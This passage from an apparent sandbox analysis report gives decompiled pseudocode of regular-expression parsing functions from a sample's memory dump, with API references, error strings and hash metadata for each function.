																 *((intOrPtr*)(_t403 - 0x10)) = _t212;
																 *((char*)(_t403 - 0x14)) = _t319 & 0xffffff00 | _t212 != 0x00000000;
																E0040BF91(_t403 - 0x24, _t403 - 0x14);
																_t312 = _t403 - 0x14;
															}
															goto L6;
														} else {
															_t322 =  &(_t401[4]);
															 *_t302 = _t197 + 1;
															_t217 = E00409BC5(_t401, 0x5c,  *_t399, _t322);
															 *((intOrPtr*)(_t403 - 0x10)) = _t217;
															 *((char*)(_t403 - 0x14)) = _t322 & 0xffffff00 | _t217 != 0x00000000;
															E0040BF91(_t403 - 0x24, _t403 - 0x14);
															_t325 = _t403 - 0x14;
															goto L57;
														}
													} else {
														_t326 =  &(_t401[4]);
														 *_t302 = _t197 + 1;
														_t223 = E00409BC5(_t401, 9,  *_t399, _t326);
														 *((intOrPtr*)(_t403 - 0x10)) = _t223;
														 *((char*)(_t403 - 0x14)) = _t326 & 0xffffff00 | _t223 != 0x00000000;
														E0040BF91(_t403 - 0x24, _t403 - 0x14);
														_t325 = _t403 - 0x14;
														goto L57;
													}
												} else {
													_t329 =  &(_t401[4]);
													 *_t302 = _t197 + 1;
													_t228 = E00409BC5(_t401, 0xd,  *_t399, _t329);
													 *((intOrPtr*)(_t403 - 0x10)) = _t228;
													 *((char*)(_t403 - 0x14)) = _t329 & 0xffffff00 | _t228 != 0x00000000;
													E0040BF91(_t403 - 0x24, _t403 - 0x14);
													_t325 = _t403 - 0x14;
													goto L57;
												}
											} else {
												_t332 =  &(_t401[4]);
												 *_t302 = _t197 + 1;
												_t233 = E00409BC5(_t401, 0xa,  *_t399, _t332);
												 *((intOrPtr*)(_t403 - 0x10)) = _t233;
												 *((char*)(_t403 - 0x14)) = _t332 & 0xffffff00 | _t233 != 0x00000000;
												E0040BF91(_t403 - 0x24, _t403 - 0x14);
												_t325 = _t403 - 0x14;
												goto L57;
											}
										} else {
											_t335 =  &(_t401[4]);
											 *_t302 = _t197 + 1;
											_t238 = E00409BC5(_t401, 0xc,  *_t399, _t335);
											 *((intOrPtr*)(_t403 - 0x10)) = _t238;
											 *((char*)(_t403 - 0x14)) = _t335 & 0xffffff00 | _t238 != 0x00000000;
											E0040BF91(_t403 - 0x24, _t403 - 0x14);
											_t325 = _t403 - 0x14;
											goto L57;
										}
									} else {
										_t338 =  &(_t401[4]);
										 *_t302 = _t197 + 1;
										_t243 = E00409BC5(_t401, 7,  *_t399, _t338);
										 *((intOrPtr*)(_t403 - 0x10)) = _t243;
										 *((char*)(_t403 - 0x14)) = _t338 & 0xffffff00 | _t243 != 0x00000000;
										E0040BF91(_t403 - 0x24, _t403 - 0x14);
										_t325 = _t403 - 0x14;
										goto L57;
									}
								}
								 *(_t403 + 0x10) = _t401[0x27];
								 *0x41720c();
								 *_t302 =  *_t302 + 1;
								_t343 =  *_t302;
								asm("sbb edx, edx");
								if(( ~( *( *(_t403 + 0x10) + 4)) &  *((intOrPtr*)( *(_t403 + 0x10) + 8)) +  *( *(_t403 + 0x10) + 4)) == _t343) {
									 *((char*)(_t403 - 0x54)) =  *((intOrPtr*)(_t403 + 0xf));
									 *0x417230(0);
									_t401 = "incomplete escape sequence \\c";
									 *0x417234(_t401, strlen(_t401));
									_t343 = _t403 - 0xb8;
									 *(_t403 - 4) = 6;
									E00404FA7(_t343, _t403 - 0x54);
									_push(0x4196f8);
									_push(_t403 - 0xb8);
									 *((intOrPtr*)(_t403 - 0xb8)) = 0x417698;
									L004153FE();
								}
								_t250 =  *_t343;
								 *_t302 = _t343 + 1;
								if(_t250 >= 0x61 && _t250 <= 0x7a) {
									_t250 =  *0x4172a4(_t250);
								}
								_t345 =  *_t399;
								_t252 = E00409BC5(_t401, _t250 ^ 0x00000040, _t345,  &(_t401[4]));
								 *((intOrPtr*)(_t403 - 0x10)) = _t252;
								 *((char*)(_t403 - 0x14)) = _t345 & 0xffffff00 | _t252 != 0x00000000;
								E0040BF91(_t403 - 0x24, _t403 - 0x14);
								_t325 = _t403 - 0x14;
								goto L57;
							}
							 *(_t403 + 8) =  *(_t403 + 8) & 0x00000000;
							 *(_t403 + 0x13) =  *(_t403 + 0x13) & 0x00000000;
							 *_t302 = _t197 + 1;
							while(1) {
								 *(_t403 + 0x14) = _t401[0x27];
								 *0x41720c();
								asm("sbb edx, edx");
								_t268 =  *_t302;
								if(( ~( *( *(_t403 + 0x14) + 4)) &  *((intOrPtr*)( *(_t403 + 0x14) + 8)) +  *( *(_t403 + 0x14) + 4)) == _t268) {
									break;
								}
								_t273 =  *_t268;
								if(_t273 < 0x30 || _t273 > 0x39) {
									if(_t273 < 0x61 || _t273 > 0x66) {
										if(_t273 < 0x41 || _t273 > 0x46) {
											break;
										} else {
											goto L30;
										}
									} else {
										goto L30;
									}
								} else {
									L30:
									_t274 = E00402FBD(_t273);
									 *(_t403 + 0x13) =  *(_t403 + 0x13) + 1;
									 *_t302 =  *_t302 + 1;
									 *(_t403 + 8) = _t274 + ( *(_t403 + 8) << 4);
									if( *(_t403 + 0x13) < 2) {
										continue;
									}
									break;
								}
							}
							_t354 =  &(_t401[4]);
							_t270 = E00409BC5(_t401,  *(_t403 + 8),  *_t399, _t354);
							 *((intOrPtr*)(_t403 - 0x10)) = _t270;
							 *((char*)(_t403 - 0x14)) = _t354 & 0xffffff00 | _t270 != 0x00000000;
							E0040BF91(_t403 - 0x24, _t403 - 0x14);
							_t325 = _t403 - 0x14;
							goto L57;
						}
						_t360 =  &(_t401[4]);
						 *_t302 = _t197 + 1;
						_t278 = E00409BC5(_t401, 0x1b,  *_t399, _t360);
						 *((intOrPtr*)(_t403 - 0x10)) = _t278;
						 *((char*)(_t403 - 0x14)) = _t360 & 0xffffff00 | _t278 != 0x00000000;
						E0040BF91(_t403 - 0x24, _t403 - 0x14);
						_t325 = _t403 - 0x14;
						goto L57;
					} else {
						 *((intOrPtr*)(_t403 - 0x28)) = _t197;
						 *(_t403 + 0x10) = __esi[0x27];
						 *0x41720c();
						asm("sbb edx, edx");
						_t286 = E004090FF(_t403 - 0x28,  ~( *( *(_t403 + 0x10) + 4)) &  *((intOrPtr*)( *(_t403 + 0x10) + 8)) +  *( *(_t403 + 0x10) + 4), 0x3e7);
						if( *((char*)( *__ebx)) == 0x30 || _t286 >= 0xa && _t286 >= __esi[0xb]) {
							 *(_t403 + 8) =  *(_t403 + 8) & 0x00000000;
							 *(_t403 + 0x13) =  *(_t403 + 0x13) & 0x00000000;
							while(1) {
								 *(_t403 + 0x14) = _t401[0x27];
								 *0x41720c();
								asm("sbb edx, edx");
								_t291 =  *_t302;
								if(( ~( *( *(_t403 + 0x14) + 4)) &  *((intOrPtr*)( *(_t403 + 0x14) + 8)) +  *( *(_t403 + 0x14) + 4)) == _t291) {
									break;
								}
								_t371 =  *_t291;
								if(_t371 >= 0x30 && _t371 <= 0x37) {
									 *(_t403 + 0x13) =  *(_t403 + 0x13) + 1;
									 *(_t403 + 8) = ( *(_t403 + 8) - 6 << 3) + _t371;
									 *_t302 = _t291 + 1;
									if( *(_t403 + 0x13) < 3) {
										continue;
									}
								}
								break;
							}
							_t368 =  &(_t401[4]);
							_t293 = E00409BC5(_t401,  *(_t403 + 8),  *_t399, _t368);
							 *((intOrPtr*)(_t403 - 0x10)) = _t293;
							 *((char*)(_t403 - 0x14)) = _t368 & 0xffffff00 | _t293 != 0x00000000;
							E0040BF91(_t403 - 0x24, _t403 - 0x14);
							_t325 = _t403 - 0x14;
							L57:
							E00406ED3(_t325);
						} else {
							_t372 =  *_t399;
							_t297 = E00409C62(_t286, _t372,  &(_t401[4]));
							 *((intOrPtr*)(_t403 - 0x10)) = _t297;
							 *((char*)(_t403 - 0x14)) = _t372 & 0xffffff00 | _t297 != 0x00000000;
							E0040BF91(_t403 - 0x24, _t403 - 0x14);
							E00406ED3(_t403 - 0x14);
							 *_t302 =  *((intOrPtr*)(_t403 - 0x28));
						}
						goto L1;
					}
				} else {
					__ecx =  *__edi;
					 *__ebx = __eax;
					__eax = E00409BC5(__esi, __eax,  *__edi, __esi + 4);
					 *((intOrPtr*)(__ebp - 0x10)) = __eax;
					__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
					__eax = __ebp - 0x14;
					 *(__ebp - 0x14) = __cl;
					__ecx = __ebp - 0x24;
					__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
					__ecx = __ebp - 0x14;
					L6:
					E00406ED3(_t312);
					 *_t302 =  *_t302 + 1;
				}
				L1:
				if( *((intOrPtr*)(_t403 - 0x20)) != 0) {
					_push(_t399);
					_push( *((intOrPtr*)(_t403 - 0x34)));
					_push(_t302);
					_push(_t403 - 0x24);
					E00408D03(_t401);
					_t211 =  *((intOrPtr*)(_t403 + 0xc));
					_t317 =  *((intOrPtr*)(_t403 - 0x20));
					 *(_t403 - 0x24) =  *(_t403 - 0x24) & 0x00000000;
					 *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x1c)))) = _t317;
					 *((intOrPtr*)(_t211 + 0x1c)) = _t317 + 4;
				}
				 *(_t403 - 4) =  *(_t403 - 4) & 0x00000000;
				E0040C5ED(_t403 - 0x30);
				 *(_t403 - 4) =  *(_t403 - 4) | 0xffffffff;
				E00406ED3(_t403 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t403 - 0xc));
				return 1;
			}

Strings

incomplete escape sequence \c, xrefs: 004059C0, 004059C5, 004059CD

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: tolowertoupper
String ID: incomplete escape sequence \c
API String ID: 1080271956-949001438
Opcode ID: 39bb49a1a08b3dd777d864a793be88eea520dc48117c4783dab6732a6018448f
Instruction ID: 44cb3acf87c3d58dae45ce2b98c07f36b87c2adb796d601b5b08f860e8cdf80f
Opcode Fuzzy Hash: 39bb49a1a08b3dd777d864a793be88eea520dc48117c4783dab6732a6018448f
Instruction Fuzzy Hash: 1202A0B190064A9FDB15CF64C991AEF77B4EF44304F14406AE852B7281EB78AF14CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00408D03 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 246
stringCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00408D03(char* __ecx) {
				signed int _t104;
				intOrPtr _t112;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				signed int _t124;
				void* _t130;
				signed int _t134;
				void* _t140;
				void* _t148;
				void* _t149;
				signed char* _t151;
				signed int _t164;
				signed int _t203;
				void* _t215;
				intOrPtr _t216;
				signed char** _t217;
				char _t221;
				char _t224;
				void* _t226;
				char* _t227;
				void* _t230;

				L004153D0();
				_t227 = __ecx;
				_t216 =  *((intOrPtr*)(__ecx + 0x27));
				 *0x41720c(_t215, _t226, _t149);
				_t104 =  *(_t216 + 4);
				_t217 =  *(_t230 + 0xc);
				asm("sbb ecx, ecx");
				if(( ~_t104 &  *((intOrPtr*)(_t216 + 8)) + _t104) !=  *_t217) {
					_t151 =  *(_t230 + 8);
					_t104 =  *((intOrPtr*)( *(_t151[4]) + 0x28))();
					if(_t104 == 0) {
						_t219 =  *((intOrPtr*)(__ecx + 0x27));
						 *(_t230 - 0xd) =  *(_t230 - 0xd) & 0x00000000;
						 *(_t230 - 0x1c) =  *(_t230 - 0x1c) | 0xffffffff;
						 *(_t230 - 0x14) =  *_t217;
						 *0x41720c();
						_t203 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x27)) + 8)) +  *(_t219 + 4);
						asm("sbb ecx, ecx");
						_t104 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t219 + 4)) & _t203) - 9;
						if(_t104 == 0) {
							L28:
							 *(_t230 - 0x18) = 1;
							goto L30;
						} else {
							_t117 = _t104 - 1;
							if(_t117 == 0) {
								L26:
								 *(_t230 - 0x18) =  *(_t230 - 0x18) & 0x00000000;
								goto L31;
							} else {
								_t118 = _t117 - 1;
								if(_t118 == 0) {
									L24:
									 *(_t230 - 0x18) =  *(_t230 - 0x18) & 0x00000000;
									 *(_t230 - 0x1c) = 1;
									goto L31;
								} else {
									_t104 = _t118 - 1;
									if(_t104 == 0) {
										 *(_t230 - 0xd) = 1;
										goto L28;
									} else {
										_t119 = _t104 - 1;
										if(_t119 == 0) {
											 *(_t230 - 0xd) = 1;
											goto L26;
										} else {
											_t120 = _t119 - 1;
											if(_t120 == 0) {
												L23:
												 *(_t230 - 0xd) = 1;
												goto L24;
											} else {
												_t104 = _t120 - 1;
												if(_t104 == 0) {
													 *0x41720c();
													asm("sbb ecx, ecx");
													_t124 = E004090FF(_t230 - 0x14,  ~( *(_t227[0x27] + 4)) &  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t227[0x27] + 4), 0xffffffff);
													_t221 = _t227[0x27];
													 *(_t230 - 0x18) = _t124;
													 *0x41720c();
													_t104 =  *(_t221 + 4);
													asm("sbb ecx, ecx");
													if(( ~_t104 &  *((intOrPtr*)(_t221 + 8)) + _t104) !=  *(_t230 - 0x14)) {
														_t222 = _t227[0x27];
														 *0x41720c();
														_t203 =  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t222 + 4);
														asm("sbb ecx, ecx");
														_t130 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t222 + 4)) & _t203) - 0x10;
														if(_t130 == 0) {
															_t151 =  *(_t230 - 0x14);
															 *0x41720c();
															asm("sbb ecx, ecx");
															_t134 = E004090FF(_t230 - 0x14,  ~( *(_t227[0x27] + 4)) &  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t227[0x27] + 4), 0xffffffff);
															if( *(_t230 - 0x14) != _t151) {
																 *(_t230 - 0x1c) = _t134;
															}
															_t224 = _t227[0x27];
															 *0x41720c();
															_t104 =  *(_t224 + 4);
															asm("sbb ecx, ecx");
															if( *(_t230 - 0x14) != ( ~_t104 &  *((intOrPtr*)(_t224 + 8)) + _t104)) {
																_t225 = _t227[0x27];
																 *0x41720c();
																_t203 =  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t225 + 4);
																asm("sbb ecx, ecx");
																_t140 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t225 + 4)) & _t203) - 0x11;
																if(_t140 == 0) {
																	L21:
																	_t104 =  *(_t230 - 0x1c);
																	if(_t104 >=  *(_t230 - 0x18)) {
																		_t151 =  *(_t230 + 8);
																		goto L30;
																	} else {
																		 *((char*)(_t230 - 0x3c)) =  *((intOrPtr*)(_t230 + 0x13));
																		 *0x417230(0);
																		_t227 = "Can\'t do {n, m} with n > m";
																		 *0x417234(_t227, strlen(_t227));
																		 *(_t230 - 4) =  *(_t230 - 4) & 0x00000000;
																		 *0x417218(_t230 - 0x3c);
																		_push(0x4196f8);
																		_push(_t230 - 0x58);
																		 *((intOrPtr*)(_t230 - 0x58)) = 0x417698;
																		L004153FE();
																		goto L23;
																	}
																} else {
																	_t104 = _t140 - 1;
																	if(_t104 == 0) {
																		 *(_t230 - 0xd) = 1;
																		goto L21;
																	}
																}
															}
														} else {
															_t148 = _t130 - 1;
															if(_t148 == 0) {
																L14:
																_t104 =  *(_t230 - 0x18);
																 *(_t230 - 0x1c) = _t104;
																L30:
																if( *(_t230 - 0x18) != 0xffffffff) {
																	L31:
																	if( *((char*)(_t230 + 0x10)) != 0 &&  *(_t230 - 0x1c) > 0x10) {
																		_t227[0xa] = _t227[0xa] & 0x00000000;
																	}
																	_t164 = _t151[4];
																	_t112 =  *((intOrPtr*)( *_t164 + 0x1c))( *(_t230 - 0x18),  *(_t230 - 0x1c), _t203 & 0xffffff00 |  *(_t230 - 0xd) == 0x00000000,  &(_t227[4]));
																	 *((intOrPtr*)(_t230 - 0x28)) = _t112;
																	 *_t151 =  *_t151 & 0x00000000;
																	 *(_t230 - 0x2c) =  *(_t230 - 0x2c) & 0x00000000;
																	 *((intOrPtr*)(_t230 - 0x20)) = _t112;
																	 *((char*)(_t230 - 0x24)) = _t164 & 0xffffff00 | _t112 != 0x00000000;
																	 *(_t230 - 4) = 1;
																	E0040BF91(_t151, _t230 - 0x24);
																	E00406ED3(_t230 - 0x24);
																	 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
																	 *( *(_t230 + 0xc)) =  *(_t230 - 0x14);
																	_t104 = E00406ED3(_t230 - 0x2c);
																}
															} else {
																_t104 = _t148 - 1;
																if(_t104 == 0) {
																	 *(_t230 - 0xd) = 1;
																	goto L14;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t230 - 0xc));
				return _t104;
			}

APIs

_EH_prolog.MSVCRT ref: 00408D08
strlen.MSVCRT ref: 00408EFD
_CxxThrowException.MSVCRT(?,004196F8), ref: 00408F2F

Strings

Can't do {n, m} with n > m, xrefs: 00408EF7, 00408EFC, 00408F04

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: Can't do {n, m} with n > m
API String ID: 1214428233-227225803
Opcode ID: e553ee17eae5ca6cfc6cb64984d613825a92450ef0f053ca12d4eeb828b68aa6
Instruction ID: 47e776d1a0f71e80584c51c7b8460619ed49745a926705c7366e66a548d0e101
Opcode Fuzzy Hash: e553ee17eae5ca6cfc6cb64984d613825a92450ef0f053ca12d4eeb828b68aa6
Instruction Fuzzy Hash: B3919271A0060A9BCF18CF64C554AEEB7B6FB44310F14826EE856A73C0DB78AD51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405EEA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00405EEF
strlen.MSVCRT ref: 00406065
_CxxThrowException.MSVCRT(?,004196F8), ref: 00406096

Part of subcall function 0040A5B8: _EH_prolog.MSVCRT ref: 0040A5BD

Strings

quantifier not expected, xrefs: 0040605F, 00406064, 0040606C

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: H_prolog$ExceptionThrowstrlen
String ID: quantifier not expected
API String ID: 2054561153-3090400379
Opcode ID: ffa739ab46cdc785f705dfba8158c4e06e3bd99cb083d143c2a2a728a6b6dcb6
Instruction ID: 96f9309febd4b26ccc1dd5471e80c689c957bcaa372d40d9e1b63adb595ee9a0
Opcode Fuzzy Hash: ffa739ab46cdc785f705dfba8158c4e06e3bd99cb083d143c2a2a728a6b6dcb6
Instruction Fuzzy Hash: 14912975700206DFCB08DF68C8D49AABBB5FF48340B14856AE916DB382DB38E955CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7A2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
stringCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040D7A2(void* __ecx) {
				intOrPtr* _t33;
				intOrPtr _t34;
				intOrPtr* _t38;
				void* _t45;
				signed int _t46;
				signed int _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t56;
				signed int _t59;
				intOrPtr* _t64;
				intOrPtr* _t67;
				intOrPtr _t68;
				char* _t70;
				signed int _t71;
				void* _t73;

				_t45 = __ecx;
				L004153D0();
				_t64 =  *((intOrPtr*)(_t73 + 0xc));
				_t56 =  *((intOrPtr*)(_t64 + 4));
				_t67 =  *((intOrPtr*)(_t56 + 4));
				_t33 =  *_t67;
				if(_t67 != _t33) {
					while(1) {
						_t71 =  *(_t45 + 8);
						if(_t71 <  *((intOrPtr*)(_t33 + 8))) {
							goto L3;
						}
						 *(_t45 + 8) = _t71 + 1;
						_t33 =  *_t33;
						if( *((intOrPtr*)(_t56 + 4)) != _t33) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				_t34 =  *_t64;
				_t68 =  *((intOrPtr*)(_t34 + 4));
				if(_t68 != 0) {
					_t59 =  *((intOrPtr*)(_t34 + 8)) - _t68 >> 2;
				} else {
					_t59 = 0;
				}
				_t46 =  *(_t45 + 8);
				if(_t46 >= _t59) {
					 *((char*)(_t73 - 0x24)) =  *((intOrPtr*)(_t73 + 0xb));
					 *0x417230(0);
					_t70 = "reference to nonexistent group";
					 *0x417234(_t70, strlen(_t70));
					 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
					_t46 = _t73 - 0x40;
					 *0x417218(_t73 - 0x24);
					_t34 = _t73 - 0x40;
					_push(0x4196f8);
					_push(_t34);
					 *(_t73 - 0x40) = 0x417698;
					L004153FE();
				}
				_t47 = _t46 << 2;
				if( *((intOrPtr*)(_t47 +  *((intOrPtr*)(_t34 + 4)))) != 0) {
					_t49 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t47 +  *((intOrPtr*)(_t34 + 4)))))) + 0x2c))(_t73 - 0x14, _t64);
					_t38 =  *((intOrPtr*)(_t73 + 8));
					 *_t38 =  *_t49;
					_t50 =  *((intOrPtr*)(_t49 + 4));
				} else {
					_t38 =  *((intOrPtr*)(_t73 + 8));
					_t52 =  *0x417690; // 0x0
					 *_t38 = _t52;
					_t50 =  *0x417694; // 0xffffffff
				}
				 *((intOrPtr*)(_t38 + 4)) = _t50;
				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
				return _t38;
			}

APIs

_EH_prolog.MSVCRT ref: 0040D7A7
strlen.MSVCRT ref: 0040D806
_CxxThrowException.MSVCRT(?), ref: 0040D838

Strings

reference to nonexistent group, xrefs: 0040D800, 0040D805, 0040D80D

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: reference to nonexistent group
API String ID: 1214428233-2717939947
Opcode ID: 7efb9d85ebac9796ab21eb8f6055979a84d87173f89abdbeec425e1fb8ad2327
Instruction ID: 522e6e50840da4ac399b5e0b3b8a6ae22c3212176d366e94a0c7a72128cb66c6
Opcode Fuzzy Hash: 7efb9d85ebac9796ab21eb8f6055979a84d87173f89abdbeec425e1fb8ad2327
Instruction Fuzzy Hash: 4E31D135A00114CFC710DF48C544ADABBF5FF89300B24C0AAE81AAB361C774ED46CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E0040DB46(intOrPtr __ecx, void* __eflags) {
				char* _t25;
				intOrPtr* _t26;
				intOrPtr _t33;
				char* _t34;
				intOrPtr _t39;
				char* _t44;
				char* _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t53;

				L004153D0();
				_push(__ecx);
				_t33 =  *((intOrPtr*)(_t53 + 0xc));
				_t46 =  *((intOrPtr*)(_t53 + 8));
				_t51 = __ecx;
				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
				 *((intOrPtr*)(__ecx + 8)) = _t46;
				 *((intOrPtr*)(__ecx + 0xc)) = _t33;
				 *((intOrPtr*)(__ecx + 0x10)) = _t33 - _t46;
				 *((intOrPtr*)(__ecx)) = 0x418524;
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				 *((intOrPtr*)(_t53 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x10))));
				 *(_t53 - 4) = 1;
				_t25 = E0040507F( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x10)))), _t33 - _t46);
				_t39 =  *((intOrPtr*)(__ecx + 0xc));
				 *((intOrPtr*)(__ecx + 0x14)) = _t25;
				_t44 = _t25;
				_t26 =  *((intOrPtr*)(__ecx + 8));
				 *((intOrPtr*)(__ecx)) = 0x4184f0;
				 *((intOrPtr*)(_t53 + 8)) = _t39;
				if(_t26 != _t39) {
					do {
						 *_t44 =  *_t26;
						_t44 = _t44 + 1;
						_t26 = _t26 + 1;
					} while (_t26 !=  *((intOrPtr*)(_t53 + 8)));
				}
				if(_t33 != _t46) {
					do {
						 *_t46 =  *0x4172a4( *_t46);
						_t46 = _t46 + 1;
					} while (_t46 != _t33);
				}
				_t34 =  *((intOrPtr*)(_t51 + 0x14));
				_t48 =  *((intOrPtr*)(_t51 + 0x10)) + _t34;
				if(_t48 != _t34) {
					do {
						 *_t34 =  *0x4172ac( *_t34);
						_t34 = _t34 + 1;
					} while (_t34 != _t48);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t51;
			}

APIs

_EH_prolog.MSVCRT ref: 0040DB4B
toupper.MSVCRT ref: 0040DBB7
tolower.MSVCRT ref: 0040DBD5

Strings

q@, xrefs: 0040DB70

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: H_prologtolowertoupper
String ID: q@
API String ID: 3817453147-2764676539
Opcode ID: 73ff7f4954beee42502f4c3e86e4eba7fd1ee4c9d3429739a6c375338378a641
Instruction ID: 1cd1e5bdde56281f47441b0658e7e07e847f1fa8a3c8823e6e5bb0bf60c20c5d
Opcode Fuzzy Hash: 73ff7f4954beee42502f4c3e86e4eba7fd1ee4c9d3429739a6c375338378a641
Instruction Fuzzy Hash: 4321C271A007418FCB20CF59C48065AFBF5EF48311B14856FE496D7741C778A844CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040718E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00407193
strlen.MSVCRT ref: 004071B3
_CxxThrowException.MSVCRT ref: 004071E5

Strings

sub-expression cannot be quantified, xrefs: 004071AD, 004071B2, 004071BA

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlen
String ID: sub-expression cannot be quantified
API String ID: 1214428233-703565053
Opcode ID: 5f16f241e1e2788338eb854fdbc6d0081568565bca7829bb6e3aeedb11ea1316
